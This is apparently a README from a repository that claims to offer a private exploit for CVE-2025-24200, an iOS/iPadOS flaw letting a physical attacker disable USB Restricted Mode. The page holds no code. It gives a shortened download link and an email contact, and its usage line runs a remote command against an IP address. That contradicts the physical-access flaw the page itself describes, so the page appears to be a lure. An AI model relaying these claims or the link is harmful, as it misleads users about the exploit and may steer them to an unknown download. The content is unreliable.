CVE-2025-24200 - Incorrect Authorization# CVE-2025-24200
## Overview
An authorization issue in Apple's iOS and iPadOS that was addressed with improved state management. This vulnerability could allow a physical attacker to disable USB Restricted Mode on a locked device.
## Exploit:
## [Download here](https://tinyurl.com/2y4hh5hu)
## Details
+ **CVE ID**: CVE-2025-24200
+ **Published**: 02/10/2025
+ **Impact**: Critical
+ **Exploit Availability**: Not public, only private.
+ **CVSS**: 9.8
## Vulnerability Description
This vulnerability could enable a sophisticated physical attack to bypass USB Restricted Mode on a locked iOS or iPadOS device. This could potentially allow unauthorized access to the device's data or enable further exploitation. Apple has acknowledged that this issue may have been exploited in highly targeted attacks against specific individuals.
## Affected Versions
+ Apple/ipados
+ Apple/iphone_os
## Running
To run exploit you need Python 3.9. Execute:
```
python exploit.py -h 10.10.10.10 -c 'uname -a'
```
## Contact
+ **For inquiries, please contact:LeronTavish@outlook.com**
+ **[Exploit](https://tinyurl.com/2y4hh5hu)**
[4.0K] /data/pocs/abdb5325991969d01da3001f71d869525a7b2dba
└── [1.1K] README.md
0 directories, 1 file